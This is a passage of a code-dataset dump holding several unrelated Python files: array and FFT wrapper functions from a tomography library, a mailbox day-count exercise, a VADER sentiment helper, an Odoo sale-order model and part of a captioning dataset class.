dtype_mapping_dict[dtype]['pytorch'])\n        arr = func(shape, device=device, requires_grad=requires_grad, **kwargs)\n    else:\n        arr = func(shape, **kwargs)\n    return arr\n\n\n@set_bn\ndef zeros_like(var, dtype=None, device=None, requires_grad=True, backend='autograd'):\n    \"\"\"\n    :param var: ADVariable or tensor.\n    \"\"\"\n    kwargs = {}\n    if dtype is not None: kwargs['dtype'] = dtype\n    func = getattr(engine_dict[backend], func_mapping_dict['zeros_like'][backend])\n    if backend == 'pytorch':\n        if dtype is not None: kwargs['dtype'] = getattr(engine_dict['pytorch'], dtype_mapping_dict[dtype]['pytorch'])\n        arr = func(var, device=device, requires_grad=requires_grad, **kwargs)\n    else:\n        arr = func(var, **kwargs)\n    return arr\n\n\n@set_bn\ndef ones_like(var, dtype=None, device=None, requires_grad=True, backend='autograd'):\n    \"\"\"\n    :param var: ADVariable or tensor.\n    \"\"\"\n    kwargs = {}\n    if dtype is not None: kwargs['dtype'] = dtype\n    func = getattr(engine_dict[backend], func_mapping_dict['ones_like'][backend])\n    if backend == 'pytorch':\n        if dtype is not None: kwargs['dtype'] = getattr(engine_dict['pytorch'], dtype_mapping_dict[dtype]['pytorch'])\n        arr = func(var, device=device, requires_grad=requires_grad, **kwargs)\n    else:\n        arr = func(var, **kwargs)\n    return arr\n\n\n@set_bn\ndef exp(var, backend='autograd'):\n    func = getattr(engine_dict[backend], func_mapping_dict['exp'][backend])\n    arr = func(var)\n    return arr\n\n\n@set_bn\ndef log(var, backend='autograd'):\n    func = getattr(engine_dict[backend], func_mapping_dict['log'][backend])\n    arr = func(var)\n    return arr\n\n\n@set_bn\ndef sign(var, backend='autograd'):\n    func = getattr(engine_dict[backend], func_mapping_dict['sign'][backend])\n    arr = func(var)\n    return arr\n\n\n@set_bn\ndef sin(var, backend='autograd'):\n    func = getattr(engine_dict[backend], func_mapping_dict['sin'][backend])\n    arr = func(var)\n    return arr\n\n\n@set_bn\ndef cos(var, backend='autograd'):\n    func = getattr(engine_dict[backend], func_mapping_dict['cos'][backend])\n    arr = func(var)\n    return arr\n\n\n@set_bn\ndef exp_complex(var_real, var_imag, backend='autograd'):\n    if backend == 'pytorch':\n        if not isinstance(var_real, tc.Tensor):\n            var_real = tc.tensor(var_real)\n        if not isinstance(var_imag, tc.Tensor):\n            var_imag = tc.tensor(var_imag)\n    e = exp(var_real)\n    return e * cos(var_imag), e * sin(var_imag)\n\n\n@set_bn\ndef arange(*args, **kwargs):\n    backend = kwargs['backend']\n    del kwargs['backend']\n    if backend == 'pytorch':\n        return tc.arange(*args, **kwargs)\n    elif backend == 'autograd':\n        return anp.arange(*args, **kwargs)\n\n\n@set_bn\ndef abs(var, backend='autograd'):\n    func = getattr(engine_dict[backend], func_mapping_dict['abs'][backend])\n    arr = func(var)\n    return arr\n\n\n@set_bn\ndef stack(var_list, axis=0, backend='autograd'):\n    func = getattr(engine_dict[backend], func_mapping_dict['stack'][backend])\n    arr = func(var_list, axis)\n    return arr\n\n\n@set_bn\ndef concatenate(var_list, axis=0, backend='autograd'):\n    func = getattr(engine_dict[backend], func_mapping_dict['concatenate'][backend])\n    arr = func(var_list, axis)\n    return arr\n\n\n@set_bn\ndef cast(var, dtype, backend='autograd'):\n    dtype = str(dtype)\n    if backend == 'autograd':\n        return var.astype(dtype)\n    elif backend == 'pytorch':\n        return getattr(var, dtype_mapping_dict[dtype]['pytorch'])()\n    elif backend == 'numpy':\n        return var.astype(dtype)\n\n\n
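# (Added) Hedged example of the (real, imag) pair convention used by exp_complex\n# above and the FFT helpers below (values illustrative): complex numbers are carried\n# as two real tensors, so e^{i*pi} is obtained as\n#\n#     re, im = exp_complex(0., anp.pi)     # re ~ -1.0, im ~ 0.0\n#\n# which stays differentiable without requiring a native complex dtype.\n\n\n@set_bn\ndef round(var, backend='autograd'):\n    func = getattr(engine_dict[backend], func_mapping_dict['round'][backend])\n    arr = func(var)\n    return 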
arr\n\n\n@set_bn\ndef fix(a, backend='autograd'):\n if backend == 'pytorch':\n return tc.trunc(a)\n elif backend == 'autograd':\n return anp.fix(a)\n\n\n@set_bn\ndef round_and_cast(var, dtype='int32', backend='autograd'):\n return cast(round(var), dtype=dtype, override_backend=backend)\n\n\n@set_bn\ndef fft(var_real, var_imag, axis=-1, backend='autograd', normalize=False):\n norm = None if not normalize else 'ortho'\n var = var_real + 1j * var_imag\n if backend == 'autograd':\n var = anp.fft.fft(var, axis=axis, norm=norm)\n return anp.real(var), anp.imag(var)\n elif backend == 'pytorch':\n var = tc.fft.fft(var, dim=axis, norm=norm)\n var_real, var_imag = tc.real(var), tc.imag(var)\n return var_real, var_imag\n\n\n@set_bn\ndef ifft(var_real, var_imag, axis=-1, backend='autograd', normalize=False):\n norm = None if not normalize else 'ortho'\n var = var_real + 1j * var_imag\n if backend == 'autograd':\n var = anp.fft.ifft(var, axis=axis, norm=norm)\n return anp.real(var), anp.imag(var)\n elif backend == 'pytorch':\n var = tc.fft.ifft(var, dim=axis, norm=norm)\n var_real, var_imag = tc.real(var), tc.imag(var)\n return var_real, var_imag\n\n\n@set_bn\ndef fft2(var_real, var_imag, axes=(-2, -1), backend='autograd', normalize=False):\n norm = None if not normalize else 'ortho'\n var = var_real + 1j * var_imag\n if backend == 'autograd':\n var = anp.fft.fft2(var, axes=axes, norm=norm)\n return anp.real(var), anp.imag(var)\n elif backend == 'pytorch':\n var = tc.fft.fft2(var, dim=axes, norm=norm)\n var_real, var_imag = tc.real(var), tc.imag(var)\n return var_real, var_imag\n\n\n@set_bn\ndef ifft2(var_real, var_imag, axes=(-2, -1), backend='autograd', normalize=False):\n norm = None if not normalize else 'ortho'\n var = var_real + 1j * var_imag\n if backend == 'autograd':\n var = anp.fft.ifft2(var, axes=axes, norm=norm)\n return anp.real(var), anp.imag(var)\n elif backend == 'pytorch':\n var = tc.fft.ifft2(var, dim=axes, norm=norm)\n var_real, var_imag = tc.real(var), tc.imag(var)\n return var_real, var_imag\n\n\n@set_bn\ndef fft2_and_shift(var_real, var_imag, axes=(-2, -1), backend='autograd', normalize=False):\n norm = None if not normalize else 'ortho'\n var = var_real + 1j * var_imag\n if backend == 'autograd':\n var = anp.fft.fftshift(anp.fft.fft2(var, axes=axes, norm=norm), axes=axes)\n return anp.real(var), anp.imag(var)\n elif backend == 'pytorch':\n var = tc.fft.fft2(var, dim=axes, norm=norm)\n var_real, var_imag = tc.real(var), tc.imag(var)\n var_real = var_real\n var_imag = var_imag\n var_real = fftshift(var_real, axes=axes)\n var_imag = fftshift(var_imag, axes=axes)\n return var_real, var_imag\n\n\n@set_bn\ndef ifft2_and_shift(var_real, var_imag, axes=(-2, -1), backend='autograd', normalize=False):\n norm = None if not normalize else 'ortho'\n var = var_real + 1j * var_imag\n if backend == 'autograd':\n var = anp.fft.fftshift(anp.fft.ifft2(var, axes=axes, norm=norm), axes=axes)\n return anp.real(var), anp.imag(var)\n elif backend == 'pytorch':\n var = tc.fft.ifft2(var, dim=axes, norm=norm)\n var_real, var_imag = tc.real(var), tc.imag(var)\n var_real = var_real\n var_imag = var_imag\n var_real = fftshift(var_real, axes=axes)\n var_imag = fftshift(var_imag, axes=axes)\n return var_real, var_imag\n\n\n@set_bn\ndef ishift_and_ifft2(var_real, var_imag, axes=(-2, -1), backend='autograd', normalize=False):\n norm = None if not normalize else 'ortho'\n var = var_real + 1j * var_imag\n if backend == 'autograd':\n var = anp.fft.ifft2(anp.fft.ifftshift(var, axes=axes), axes=axes, norm=norm)\n 
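# (Added note) Inverse of fft2_and_shift above: the inverse shift is applied\n    # before the inverse FFT, so ishift_and_ifft2(*fft2_and_shift(re, im)) round-trips\n    # when called with the same 'normalize' setting.\n    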
return anp.real(var), anp.imag(var)\n elif backend == 'pytorch':\n var = tc.fft.ifft2(tc.fft.ifftshift(var, dim=axes), dim=axes, norm=norm)\n var_real, var_imag = tc.real(var), tc.imag(var)\n var_real = var_real\n var_imag = var_imag\n return var_real, var_imag\n\n\n@set_bn\ndef convolve_with_transfer_function(arr_real, arr_imag, h_real, h_imag, axes=(-2, -1), backend='autograd'):\n f_real, f_imag = fft2(arr_real, arr_imag, axes=axes, override_backend=backend)\n fh_real = f_real * h_real - f_imag * h_imag\n fh_imag = f_real * h_imag + f_imag * h_real\n return ifft2(fh_real, fh_imag, override_backend=backend)\n\n\n@set_bn\ndef convolve_with_impulse_response(arr_real, arr_imag, h_real, h_imag, axes=(-2, -1), backend='autograd', normalize=True):\n f_real, f_imag = fft2(arr_real, arr_imag, axes=axes, override_backend=backend, normalize=normalize)\n h_real, h_imag = fft2(h_real, h_imag, override_backend=backend, normalize=normalize)\n fh_real = f_real * h_real - f_imag * h_imag\n fh_imag = f_real * h_imag + f_imag * h_real\n return ifft2(fh_real, fh_imag, override_backend=backend, normalize=normalize)\n\n\n@set_bn\ndef complex_mul(a_real, a_imag, b_real, b_imag, backend='autograd'):\n return (a_real * b_real - a_imag * b_imag, a_real * b_imag + a_imag * b_real)\n\n\n@set_bn\ndef fftshift(var, axes=(1, 2), backend='autograd'):\n \"\"\"\n :param var: [N, H, W, 2], where the last dimension represents real and imaginary parts.\n \"\"\"\n if backend == 'autograd':\n return anp.fft.fftshift(var, axes=axes)\n elif backend == 'pytorch':\n s = var.shape\n for i in axes:\n p2 = (s[i] + 1) // 2\n v = tc.split(var, p2, dim=i)\n if len(v) == 3:\n v1, v2 = (v[0], tc.cat([v[1], v[2]], dim=i))\n else:\n v1, v2 = v\n var = tc.cat([v2, v1], dim=i)\n return var\n\n\n@set_bn\ndef ifftshift(var, axes=(1, 2), backend='autograd'):\n \"\"\"\n :param var: [N, H, W, 2], where the last dimension represents real and imaginary parts.\n \"\"\"\n if backend == 'autograd':\n return anp.fft.ifftshift(var, axes=axes)\n elif backend == 'pytorch':\n s = var.shape\n for i in axes:\n p2 = s[i] - (s[i] + 1) // 2\n v = tc.split(var, p2, dim=i)\n if len(v) == 3:\n v1, v2 = (v[0], tc.cat([v[1], v[2]], dim=i))\n else:\n v1, v2 = v\n var = tc.cat([v2, v1], dim=i)\n return var\n\n\n@set_bn\ndef split_channel(var, backend='autograd'):\n if backend == 'autograd':\n var0, var1 = anp.split(var, var.shape[-1], axis=-1)\n slicer = [slice(None)] * (var.ndim - 1) + [0]\n return var0[tuple(slicer)], var1[tuple(slicer)]\n elif backend == 'pytorch':\n var0, var1 = tc.split(var, 1, dim=-1)\n slicer = [slice(None)] * (var.ndim - 1) + [0] #this removes the last singleton dimension...\n return var0[tuple(slicer)], var1[tuple(slicer)]\n \n@set_bn\ndef clip(var, a1, a2, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['clip'][backend])\n if backend == 'pytorch':\n if not isinstance(var, tc.Tensor):\n var = tc.tensor(var)\n arr = func(var, a1, a2)\n return arr\n\n\n@set_bn\ndef reshape(var, newshape, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['reshape'][backend])\n arr = func(var, newshape)\n return arr\n\n\n@set_bn\ndef floor(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['floor'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef floor_and_cast(var, dtype='int32', backend='autograd'):\n return cast(floor(var, override_backend=backend), dtype=dtype, override_backend=backend)\n\n\n@set_bn\ndef ceil(var, backend='autograd'):\n func = 
getattr(engine_dict[backend], func_mapping_dict['ceil'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef ceil_and_cast(var, dtype='int32', backend='autograd'):\n return cast(ceil(var, override_backend=backend), dtype=dtype, override_backend=backend)\n\n\n@set_bn\ndef sqrt(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['sqrt'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef mean(var, axis=None, backend='autograd'):\n args = {}\n if backend == 'autograd':\n if axis is not None:\n args['axis'] = axis\n return anp.mean(var, **args)\n elif backend == 'pytorch':\n if axis is not None:\n args['dim'] = axis\n return tc.mean(var, **args)\n\n\n@set_bn\ndef std(var, backend='autograd'):\n if backend == 'autograd':\n return anp.std(var)\n elif backend == 'pytorch':\n return tc.std(var)\n\n\n@set_bn\ndef max(var, return_number=True, axis=None, backend='autograd'):\n if backend == 'autograd':\n a = anp.max(var, axis=axis)\n elif backend == 'pytorch':\n if axis is None:\n a = tc.max(var)\n if return_number:\n a = float(to_numpy(a))\n else:\n a = tc.max(var, dim=axis)\n return a\n\n\n@set_bn\ndef min(var, return_number=True, axis=None, backend='autograd'):\n if backend == 'autograd':\n a = anp.min(var, axis=axis)\n elif backend == 'pytorch':\n if axis is None:\n a = tc.min(var)\n if return_number:\n a = float(to_numpy(a))\n else:\n a = tc.min(var, dim=axis)\n return a\n\n\n@set_bn\ndef real(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['real'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef imag(var, backend='autograd'):\n func = getattr(engine_dict[backend], func_mapping_dict['imag'][backend])\n arr = func(var)\n return arr\n\n\n@set_bn\ndef tile(var, cp, backend='autograd'):\n if backend == 'autograd':\n return anp.tile(var, cp)\n elif backend == 'pytorch':\n return var.repeat(*cp)\n\n\n@set_bn\ndef repeat(var, cp, axis=None, backend='autograd'):\n if backend == 'autograd':\n return anp.repeat(var, cp, axis=axis)\n elif backend == 'pytorch':\n return tc.repeat_interleave(var, cp, dim=axis)\n\n\n@set_bn\ndef flip(var, axis=[0], backend='autograd'):\n if backend == 'autograd':\n return anp.flip(var, axis=axis)\n elif backend == 'pytorch':\n try:\n _ = len(axis)\n return tc.flip(var, dims=axis)\n except:\n return tc.flip(var, dims=[axis])\n\n\n@set_bn\ndef pad(var, pad_len, mode='constant', constant_values=0, backend='autograd'):\n \"\"\"\n Pad array.\n [ATTENTION: The behavior of this function is different between Autograd and Pytorch backend.]\n\n :param pad_len: A tuple of tuples. 
Consistent with the format of numpy.pad.\n    :param mode: Choose from 'constant', 'edge', 'reflect', 'wrap'.\n    \"\"\"\n    args = {}\n    mode_dict = {'constant': {'autograd': 'constant', 'pytorch': 'constant'},\n                 'edge': {'autograd': 'edge', 'pytorch': 'replicate'},\n                 'reflect': {'autograd': 'reflect', 'pytorch': 'reflect'},\n                 'wrap': {'autograd': 'wrap', 'pytorch': 'circular'}}\n    if mode == 'constant':\n        args['constant_values'] = constant_values\n    if backend == 'autograd':\n        return anp.pad(var, pad_len, mode=mode_dict[mode][backend], **args)\n    elif backend == 'pytorch':\n        pad_len = [x for y in pad_len[::-1] for x in y]\n        return tc.nn.functional.pad(var, pad_len, mode=mode_dict[mode][backend], value=constant_values)\n    elif backend == 'numpy':\n        return np.pad(var, pad_len, mode=mode, **args)\n\n\n@set_bn\ndef sum(var, axis=None, backend='autograd'):\n    func = getattr(engine_dict[backend], func_mapping_dict['sum'][backend])\n    if backend == 'autograd':\n        arr = func(var, axis=axis)\n    elif backend == 'pytorch':\n        if axis is None:\n            arr = tc.sum(var)\n        else:\n            arr = tc.sum(var, dim=axis)\n    return arr\n\n\n@set_bn\ndef prod(var, axis=None, backend='autograd'):\n    func = getattr(engine_dict[backend], func_mapping_dict['prod'][backend])\n    if backend == 'autograd':\n        args = {}\n        if axis is not None:\n            args['axis'] = axis\n        arr = func(var, **args)\n    elif backend == 'pytorch':\n        args = {}\n        if axis is not None:\n            args['dim'] = axis\n        arr = tc.prod(var, **args)\n    return arr\n\n\n@set_bn\ndef roll(var, shifts, axes=0, backend='autograd'):\n    if backend == 'autograd':\n        return anp.roll(var, shifts, axis=axes)\n    elif backend == 'pytorch':\n        return tc.roll(var, shifts, dims=axes)\n\n\n@set_bn\ndef arctan2(var1, var2, backend='autograd'):\n    func = getattr(engine_dict[backend], func_mapping_dict['arctan2'][backend])\n    arr = func(var1, var2)\n    return arr\n\n\n@set_bn\ndef nonzero(var, backend='autograd'):\n    func = getattr(engine_dict[backend], func_mapping_dict['nonzero'][backend])\n    arr = func(var)\n    return arr\n\n\n@set_bn\ndef norm(var_real, var_imag, backend='autograd'):\n    if backend == 'autograd':\n        return abs(var_real + 1j * var_imag)\n    elif backend == 'pytorch':\n        return tc.norm(tc.stack([var_real, var_imag], dim=0), dim=0)\n\n\n@set_bn\ndef vec_norm(arr, backend='autograd'):\n    if backend == 'autograd':\n        return anp.sqrt(anp.sum(abs(arr ** 2)))\n    elif backend == 'pytorch':\n        return tc.sqrt(tc.sum(arr ** 2))\n\n\n@set_bn\ndef swap_axes(arr, axes=(0, 1), backend='autograd'):\n    if backend == 'autograd':\n        temp = [*axes]\n        if axes[0] < axes[1]:\n            temp = [axes[1], axes[0]]\n        axes = []\n        for i in range(len(arr.shape)):\n            if i == temp[0]:\n                axes.append(temp[1])\n            elif i == temp[1]:\n                axes.append(temp[0])\n            else:\n                axes.append(i)\n        return anp.transpose(arr, axes)\n    elif backend == 'pytorch':\n        return tc.transpose(arr, axes[0], axes[1])\n\n\n@set_bn\ndef permute_axes(arr, axes_order, backend='autograd'):\n    if backend == 'autograd':\n        return anp.transpose(arr, axes_order)\n    elif backend == 'pytorch':\n        return arr.permute(axes_order)\n\n\n
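# (Added) Hedged example of the pad_len convention handled above (shapes illustrative):\n#\n#     pad(anp.zeros([4, 5]), ((1, 1), (2, 2)))   # numpy-style: ((top, bottom), (left, right))\n#     # The PyTorch branch flattens this, last dimension first, into [2, 2, 1, 1],\n#     # which is the order torch.nn.functional.pad expects.\n\n\n@set_bn\ndef grid_sample(arr, grid, interpolation='bilinear', axis=0, device=None, backend='autograd'):\n    \"\"\"\n    :param arr: a stack of 2D images in [N, H, W, C].\n    :param grid: [N, 2].\n    \"\"\"\n    assert flag_pytorch_avail, 'Wrapper function grid_sample requires Pytorch.'\n    flag_convert_arr = False\n    if not isinstance(arr, tc.Tensor):\n        flag_convert_arr = True\n        arr = tc.tensor(arr, requires_grad=False, device=device)\n    if not isinstance(grid, tc.Tensor):\n        grid = tc.tensor(grid, requires_grad=False, 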
device=device)\n # x coordinates comes first in torch.grid_sample.\n grid = tc.flip(grid, (1,))\n\n axis_arrangement = [0, 1, 2, 3]\n # Move channel to the 2nd dimension.\n axis_arrangement[1], axis_arrangement[3] = axis_arrangement[3], axis_arrangement[1]\n # Move invariant axis to front.\n if axis != 0:\n q = axis_arrangement.index(axis)\n axis_arrangement[0], axis_arrangement[q] = axis_arrangement[q], axis_arrangement[0]\n if axis_arrangement[2] > axis_arrangement[3]:\n axis_arrangement[2], axis_arrangement[3] = axis_arrangement[3], axis_arrangement[2]\n arr = permute_axes(arr, axis_arrangement, override_backend='pytorch')\n\n # Convert grid to [-1, 1] scale.\n # arr_center = (tc.tensor(arr.shape[2:4], requires_grad=False, device=device) - 1) / 2\n # grid = (grid - arr_center) / (arr_center + 0.5)\n arr_shape = create_constant(arr.shape[2:], dtype=pytorch_dtype_query_mapping_dict[arr.dtype],\n device=get_var_device(arr))\n grid = -1 + 2. * grid / arr_shape + 1. / arr_shape\n\n grid = reshape(grid, [1, *arr.shape[2:4], 2], override_backend='pytorch')\n grid = tile(grid, [arr.shape[0], 1, 1, 1], override_backend='pytorch')\n grid = cast(grid, pytorch_dtype_query_mapping_dict[arr.dtype], override_backend='pytorch')\n arr = tc.nn.functional.grid_sample(arr, grid, padding_mode='border', mode=interpolation, align_corners=False)\n arr = permute_axes(arr, [axis_arrangement.index(0), axis_arrangement.index(1),\n axis_arrangement.index(2), axis_arrangement.index(3)], override_backend='pytorch')\n if flag_convert_arr:\n arr = arr.data.numpy()\n return arr\n\n\n@set_bn\ndef matmul(a, b, backend='autograd'):\n if backend == 'autograd':\n return anp.matmul(a, b)\n elif backend == 'pytorch':\n return tc.matmul(a, b)\n\n\n@set_bn\ndef affine_transform(arr, transform, backend='autograd'):\n \"\"\"\n :param arr: a stack of 2D images in [N, H, W].\n :param transform: A [2, 3] matrix for affine transform.\n \"\"\"\n if backend == 'autograd':\n raise NotImplementedError('Rescaling in Autograd is not yet implemented. Use Pytorch backend instead.')\n elif backend == 'pytorch':\n n = arr.shape[0]\n arr_size = arr.shape[1:]\n m = reshape(transform, [-1, 2, 3], override_backend=backend)\n m = cast(tile(m, [n, 1, 1], override_backend=backend), pytorch_dtype_query_mapping_dict[arr.dtype], override_backend=backend)\n g = tc.nn.functional.affine_grid(m, [n, 1, *arr_size])\n arr_new = tc.reshape(arr, [n, 1, *arr.shape[1:]])\n arr_new = tc.nn.functional.grid_sample(arr_new, g, padding_mode='border')\n return arr_new[:, 0, :, :]\n\n\n@set_bn\ndef rotate(arr, theta, axis=0, backend='autograd', device=None):\n \"\"\"\n A rotate function that allows taking gradient with regards to theta.\n\n :param arr: a 3D object in [len_y, len_x, len_z, n_channels].\n \"\"\"\n if backend == 'autograd':\n warnings.warn('Rotate (with grad) in Autograd is not yet implemented. 
Use Pytorch backend instead.')\n        axes = []\n        for i in range(3):\n            if i != axis:\n                axes.append(i)\n        return scipy.ndimage.rotate(arr, -anp.rad2deg(theta), reshape=False, axes=axes, mode='nearest', order=1)\n    elif backend == 'pytorch':\n        try:\n            theta = theta.view(1)\n        except:\n            theta = tc.tensor(theta, requires_grad=False, device=device)\n            theta = theta.view(1)\n        axis_arrangement = [0, 1, 2, 3]\n        # Move channel to the 2nd dimension.\n        axis_arrangement[1], axis_arrangement[3] = axis_arrangement[3], axis_arrangement[1]\n        # Move invariant axis to front.\n        if axis != 0:\n            q = axis_arrangement.index(axis)\n            axis_arrangement[0], axis_arrangement[q] = axis_arrangement[q], axis_arrangement[0]\n        if axis_arrangement[2] < axis_arrangement[3]:\n            theta = -theta\n        arr = permute_axes(arr, axis_arrangement, override_backend='pytorch')\n        naught = cast(tc.tensor([0.], device=device), pytorch_dtype_query_mapping_dict[theta.dtype], override_backend='pytorch')\n        m0 = tc.cat([tc.cos(theta), -tc.sin(theta), naught])\n        m1 = tc.cat([tc.sin(theta), tc.cos(theta), naught])\n        m = tc.stack([m0, m1]).view(1, 2, 3)\n        m = cast(tile(m, [arr.shape[0], 1, 1], override_backend='pytorch'), pytorch_dtype_query_mapping_dict[arr.dtype], override_backend='pytorch')\n        g = tc.nn.functional.affine_grid(m, arr.shape, align_corners=False)\n\n        arr = tc.nn.functional.grid_sample(arr, g, padding_mode='border', align_corners=False)\n        arr = permute_axes(arr, [axis_arrangement.index(0), axis_arrangement.index(1),\n                                 axis_arrangement.index(2), axis_arrangement.index(3)], override_backend='pytorch')\n        return arr\n\n\n@set_bn\ndef pcc(obj, backend='autograd'):\n    \"\"\"\n    Calculate the Pearson correlation coefficient of images in an array along the last dimension.\n    :param obj: Tensor.\n    :return: Pearson correlation coefficient.\n    \"\"\"\n    slicer_z = [slice(None)] * (len(obj.shape) - 1)\n    for i_slice in range(obj.shape[-1]):\n        if i_slice == 0:\n            nom = obj[tuple(slicer_z + [i_slice])] - mean(obj[tuple(slicer_z + [i_slice])])\n            denom = std(obj[tuple(slicer_z + [i_slice])])\n        else:\n            nom = nom * (obj[tuple(slicer_z + [i_slice])] - mean(obj[tuple(slicer_z + [i_slice])]))\n            denom = denom * std(obj[tuple(slicer_z + [i_slice])])\n    nom = sum(nom)\n    return abs(nom / denom)\n\n\n@set_bn\ndef tomography_filter(arr, axis=2, filter_type='hamming', backend='autograd'):\n    \"\"\"\n    Apply a 1D ramp filter needed for tomography reconstruction.\n\n    :param arr: Data array.\n    :param axis: Axis of slice projection.\n    :return:\n    \"\"\"\n    func = getattr(scipy.signal.windows, filter_type)\n    filter = func(arr.shape[axis])\n    if axis != len(arr.shape) - 1:\n        arr = swap_axes(arr, [axis, len(arr.shape) - 1])\n    if backend == 'pytorch':\n        args = {'device': arr.device}\n    else:\n        args = {}\n    arr_r, arr_i = fft(arr, zeros_like(arr, requires_grad=False, **args))\n    arr_r = arr_r * filter\n    arr_i = arr_i * filter\n    arr, _ = ifft(arr_r, arr_i)\n    if axis != len(arr.shape) - 1:\n        arr = swap_axes(arr, [axis, len(arr.shape) - 1])\n    return arr\n\n\n@set_bn\ndef argmax(arr, backend='autograd'):\n    func = getattr(engine_dict[backend], func_mapping_dict['argmax'][backend])\n    arr = func(arr)\n    return arr\n\n\n@set_bn\ndef tensordot(a, b, axes=None, backend='autograd'):\n    \"\"\"\n    :param axes: Complies with the Numpy format.\n    \"\"\"\n    dims = axes\n    if backend == 'pytorch':\n        if isinstance(axes, (list, tuple)):\n            if isinstance(axes[0], int):\n                dims = []\n                for i in axes:\n                    dims.append((i,))\n        return tc.tensordot(a, b, dims=dims)\n    elif backend == 'autograd':\n        return anp.tensordot(a, b, axes=dims)\n\n\n
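# (Added) Hedged sketch of the axes translation performed above (values illustrative):\n#\n#     tensordot(a, b, axes=(1, 0))\n#     # numpy: contract axis 1 of a with axis 0 of b\n#     # pytorch: rewritten to tc.tensordot(a, b, dims=[(1,), (0,)])\n\n\n@set_bn\ndef isnan(arr, 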
backend='autograd'):\n    if backend == 'pytorch':\n        return tc.isnan(arr)\n    elif backend == 'autograd':\n        return anp.isnan(arr)\n","repo_name":"mdw771/adorym","sub_path":"adorym/wrappers.py","file_name":"wrappers.py","file_ext":"py","file_size_in_byte":42812,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"60"}
{"seq_id":"11224370798","text":"# file_name = input(\"Enter a file name: \")\nfile_name = \"mbox-short.txt\"\ntry:\n    f = open(file_name)\nexcept FileNotFoundError as e:\n    print('File can\\'t be opened: '+file_name)\n    exit(0)\n\ncount = {}\nfor line in f.readlines():\n    words = line.split()\n    if len(words) < 3 or words[0] != \"From\":\n        continue\n    day = words[2]\n    if day not in count:\n        count[day] = 0\n    count[day] += 1\n\nprint(count)\n","repo_name":"murtraja/p4e-exercises","sub_path":"ch9-dict/e2_day_count.py","file_name":"e2_day_count.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"233703369","text":"from nltk.sentiment.vader import SentimentIntensityAnalyzer\nimport nltk\nnltk.download('vader_lexicon')\n\ndef sentimentCheck(string):\n    sid = SentimentIntensityAnalyzer()\n    score = sid.polarity_scores(string)\n    result = \"Neutral\"\n    neutralCheck1 = score[\"neu\"] - score[\"neg\"]\n    neutralCheck2 = score[\"neu\"] - score[\"pos\"]\n    if score[\"neu\"] > score[\"pos\"] and score[\"neu\"] > score[\"neg\"] and neutralCheck1 >= 0.16 and neutralCheck2 >= 0.16 and score[\"neg\"] < 0.42 and score[\"pos\"] < 0.42:\n        result = \"Neutral\"\n    elif score[\"neg\"] > score[\"pos\"] and neutralCheck1 <= 0.16:\n        result = \"Negative\"\n    elif score[\"pos\"] > score[\"neg\"] and neutralCheck2 <= 0.16:\n        result = \"Positive\"\n    else:\n        result = \"Neutral\"\n    #print(score)\n    return result\n\n#result = sentimentCheck(\"neutral\")\n#print(result)\n\nimport dill as pickle\nwith open('sentiment.pkl', 'wb') as file:\n    pickle.dump(sentimentCheck, file)","repo_name":"abduls22/NLP-sentiment-analysis","sub_path":"model/sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"2716828917","text":"from odoo import fields, models\n\n\nclass SaleOrder(models.Model):\n    _inherit = \"sale.order\"\n\n    #manual_status = fields.Boolean(\"manual_status\",)\n\n    manual_status = fields.Selection([\n        ('consu', 'Consumable'),\n        ('service', 'Service')], string='Product Type', default='consu', required=True,\n        help='A storable product is a product for which you manage stock. 
The Inventory app has to be installed.\\n'\n 'A consumable product is a product for which stock is not managed.\\n'\n 'A service is a non-material product you provide.')","repo_name":"kanda999/project-oca","sub_path":"sale_manual_status/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70959917630","text":"import json\r\nimport torch\r\nimport os.path as osp\r\nimport random\r\nfrom datasets import load_dataset\r\nfrom .utils import pre_captions, img_hash_to_addr, collate_test_set, image_transform\r\n\r\nfrom PIL import Image\r\nfrom torch.utils.data import Dataset\r\n\r\n\r\nclass Personality_Captions(Dataset):\r\n def __init__(self, dataset, preprocessor, config:dict, pretrain:bool=False, **kwargs):\r\n super().__init__()\r\n # config: at least contains keys of [\"style_dict\", \"pfx_len\", \"img_addr\", \"img_attr\"]\r\n with open(config[\"style_dict\"]) as f:\r\n self.style_dict=json.load(f)[\"items\"]\r\n self.pfx_len=config[\"prefix_len\"]\r\n self.n_cls=config[\"n_cls\"]\r\n assert len(self.style_dict)==self.n_cls, \\\r\n \"Style number from the dict does not match that of config file. \\\r\n Got {} and {} respectively.\".format(len(self.style_dict),self.n_cls)\r\n\r\n # preprocessor: BlipPreprocessor\r\n self.preprocessor=preprocessor\r\n # dataset: load from datasets.load_dataset\r\n self.dataset=dataset\r\n # merge additional column into \"comment\"\r\n if \"additional_comments\" in self.dataset.column_names:\r\n self.dataset=self.dataset.map(collate_test_set, batch_size=128)\r\n\r\n # prefix ids w.r.o styles\r\n # n_cls=216, with the last being unk\r\n self.pfx_ids=torch.arange(0, self.n_cls*self.pfx_len)\\\r\n .view(-1,self.pfx_len).contiguous()\r\n \r\n self.img_addr=config[\"img_path\"]\r\n self.img_name_fmt=\"{}%s\"%(config[\"img_attr\"])\r\n\r\n # others\r\n self.image_size=config[\"image_size\"]\r\n self.split=config[\"split\"]\r\n self.max_len=config.get(\"max_len\", 30)\r\n # pretrain now only available for train split\r\n self.pretrain=pretrain and self.split==\"train\"\r\n\r\n def __getitem__(self, index):\r\n # 对于单int提取的情况则升维\r\n squeeze_list=False\r\n if isinstance(index, int):\r\n squeeze_list=True\r\n index=[index]\r\n\r\n is_train=(self.split==\"train\")\r\n 